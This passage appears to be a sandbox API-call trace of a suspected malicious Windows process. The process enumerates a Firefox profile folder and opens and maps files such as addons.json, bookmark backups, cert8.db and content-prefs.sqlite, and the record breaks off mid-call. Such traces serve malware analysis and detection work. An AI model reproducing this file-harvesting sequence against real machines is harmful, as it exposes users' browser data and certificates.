[0589.467] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 58 [0589.467] LocalAlloc (uFlags=0x40, uBytes=0xfe) returned 0x5500d0 [0589.467] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*", lpFindFileData=0x52dd50 | out: lpFindFileData=0x52dd50) returned 0x57ca60 [0589.467] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.467] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd50 | out: lpFindFileData=0x52dd50) returned 1 [0589.467] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.467] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.467] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52dd50 | out: lpFindFileData=0x52dd50) returned 1 [0589.467] lstrcmpiW (lpString1="3y2joh8o.default", lpString2=".") returned 1 [0589.467] lstrcmpiW (lpString1="3y2joh8o.default", lpString2="..") returned 1 [0589.467] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 58 [0589.467] lstrlenW (lpString="\\") returned 1 [0589.467] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 58 [0589.467] LocalAlloc (uFlags=0x40, uBytes=0xf8) returned 0x59a8a0 [0589.467] lstrlenW (lpString="3y2joh8o.default") returned 16 [0589.467] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned 59 [0589.467] LocalAlloc (uFlags=0x40, uBytes=0x118) returned 0x578b10 [0589.468] LocalFree (hMem=0x59a8a0) returned 0x0 [0589.468] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.468] lstrlenW (lpString="\\*.*") returned 4 [0589.468] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.468] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x59a8a0 [0589.468] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\*.*", lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 0x57c9a0 [0589.468] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.468] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.468] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.468] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.468] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.468] lstrlenW (lpString="\\") returned 1 [0589.468] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.468] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.468] lstrlenW (lpString="addons.json") returned 11 [0589.468] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.468] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x5e1d10 [0589.468] LocalFree (hMem=0x578c30) returned 0x0 [0589.468] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.468] CloseHandle (hObject=0x668) returned 1 [0589.468] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0589.468] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x578c30 [0589.468] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json", lpDst=0x578c30, nSize=0x58 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json") returned 0x58 [0589.468] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.468] CloseHandle (hObject=0x668) returned 1 [0589.468] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.468] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18 [0589.468] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.468] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.469] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.469] CloseHandle (hObject=0x66c) returned 1 [0589.469] CloseHandle (hObject=0x668) returned 1 [0589.469] LocalFree (hMem=0x578c30) returned 0x0 [0589.469] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.469] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.469] lstrcmpiW (lpString1="bookmarkbackups", lpString2=".") returned 1 [0589.469] lstrcmpiW (lpString1="bookmarkbackups", lpString2="..") returned 1 [0589.469] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.469] lstrlenW (lpString="\\") returned 1 [0589.469] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.469] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.469] lstrlenW (lpString="bookmarkbackups") returned 15 [0589.469] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.469] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x56afc8 [0589.469] LocalFree (hMem=0x578c30) returned 0x0 [0589.469] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0589.469] lstrlenW (lpString="\\*.*") returned 4 [0589.469] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0589.469] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56c300 [0589.469] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\*.*", lpFindFileData=0x52d860 | out: lpFindFileData=0x52d860) returned 0x5b9b50 [0589.469] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.469] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d860 | out: lpFindFileData=0x52d860) returned 1 [0589.469] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.469] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.469] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d860 | out: lpFindFileData=0x52d860) returned 1 [0589.469] lstrlenW (lpString="\\") returned 1 [0589.469] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0589.469] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56b3a0 [0589.469] lstrlenW (lpString="bookmarks-2017-06-30_5.json") returned 27 [0589.469] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\") returned 92 [0589.469] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x578c30 [0589.469] LocalFree (hMem=0x56b3a0) returned 0x0 [0589.470] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0589.470] CloseHandle (hObject=0x66c) returned 1 [0589.470] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x78 [0589.470] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x5e1d10 [0589.470] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json", lpDst=0x5e1d10, nSize=0x78 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json") returned 0x78 [0589.470] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0589.470] CloseHandle (hObject=0x66c) returned 1 [0589.470] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0589.470] GetFileSize (in: hFile=0x66c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbdb [0589.470] CreateFileMappingW (hFile=0x66c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4e0 [0589.470] MapViewOfFile (hFileMappingObject=0x4e0, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.470] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.470] CloseHandle (hObject=0x4e0) returned 1 [0589.470] CloseHandle (hObject=0x66c) returned 1 [0589.470] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.470] LocalFree (hMem=0x578c30) returned 0x0 [0589.471] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d860 | out: lpFindFileData=0x52d860) returned 1 [0589.471] lstrlenW (lpString="\\") returned 1 [0589.471] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0589.471] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56b3a0 [0589.471] lstrlenW (lpString="bookmarks-2017-07-26_5.json") returned 27 [0589.471] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\") returned 92 [0589.471] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x578c30 [0589.471] LocalFree (hMem=0x56b3a0) returned 0x0 [0589.471] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0589.471] CloseHandle (hObject=0x66c) returned 1 [0589.471] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x78 [0589.471] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x5e1d10 [0589.471] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json", lpDst=0x5e1d10, nSize=0x78 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json") returned 0x78 [0589.471] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0589.471] CloseHandle (hObject=0x66c) returned 1 [0589.471] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0589.471] GetFileSize (in: hFile=0x66c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbdb [0589.471] CreateFileMappingW (hFile=0x66c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4e0 [0589.471] MapViewOfFile (hFileMappingObject=0x4e0, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.471] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.472] CloseHandle (hObject=0x4e0) returned 1 [0589.472] CloseHandle (hObject=0x66c) returned 1 [0589.472] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.472] LocalFree (hMem=0x578c30) returned 0x0 [0589.472] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d860 | out: lpFindFileData=0x52d860) returned 0 [0589.472] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0589.472] LocalFree (hMem=0x56c300) returned 0x0 [0589.472] LocalFree (hMem=0x56afc8) returned 0x0 [0589.472] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.472] lstrlenW (lpString="\\") returned 1 [0589.472] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.472] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.472] lstrlenW (lpString="cert8.db") returned 8 [0589.472] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.472] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x5e1d10 [0589.472] LocalFree (hMem=0x578c30) returned 0x0 [0589.472] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.472] CloseHandle (hObject=0x668) returned 1 [0589.472] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x55 [0589.472] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x578c30 [0589.472] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db", lpDst=0x578c30, nSize=0x55 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db") returned 0x55 [0589.472] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.472] CloseHandle (hObject=0x668) returned 1 [0589.472] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.472] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10000 [0589.472] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.472] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.473] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.473] CloseHandle (hObject=0x66c) returned 1 [0589.473] CloseHandle (hObject=0x668) returned 1 [0589.473] LocalFree (hMem=0x578c30) returned 0x0 [0589.473] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.473] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.473] lstrlenW (lpString="\\") returned 1 [0589.473] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.474] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.474] lstrlenW (lpString="compatibility.ini") returned 17 [0589.474] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.474] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56afc8 [0589.474] LocalFree (hMem=0x578c30) returned 0x0 [0589.474] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.474] CloseHandle (hObject=0x668) returned 1 [0589.474] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5e [0589.474] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56c300 [0589.474] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini", lpDst=0x56c300, nSize=0x5e | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini") returned 0x5e [0589.474] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.474] CloseHandle (hObject=0x668) returned 1 [0589.474] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.474] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xce [0589.474] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.474] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.474] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.474] CloseHandle (hObject=0x66c) returned 1 [0589.474] CloseHandle (hObject=0x668) returned 1 [0589.475] LocalFree (hMem=0x56c300) returned 0x0 [0589.475] LocalFree (hMem=0x56afc8) returned 0x0 [0589.475] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.475] lstrlenW (lpString="\\") returned 1 [0589.475] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.475] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.475] lstrlenW (lpString="content-prefs.sqlite") returned 20 [0589.475] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.475] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x5e1d10 [0589.475] LocalFree (hMem=0x578c30) returned 0x0 [0589.475] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.475] CloseHandle (hObject=0x668) returned 1 [0589.475] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x61 [0589.475] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x5e1e60 [0589.475] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite", lpDst=0x5e1e60, nSize=0x61 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite") returned 0x61 [0589.475] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.475] CloseHandle (hObject=0x668) returned 1 [0589.475] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0589.475] GetFileSize (in: hFile=0x668, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x38000 [0589.475] CreateFileMappingW (hFile=0x668, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x66c [0589.475] MapViewOfFile (hFileMappingObject=0x66c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.476] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.478] CloseHandle (hObject=0x66c) returned 1 [0589.478] CloseHandle (hObject=0x668) returned 1 [0589.478] LocalFree (hMem=0x5e1e60) returned 0x0 [0589.478] LocalFree (hMem=0x5e1d10) returned 0x0 [0589.478] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dad8 | out: lpFindFileData=0x52dad8) returned 1 [0589.478] lstrlenW (lpString="\\") returned 1 [0589.478] lstrlenW 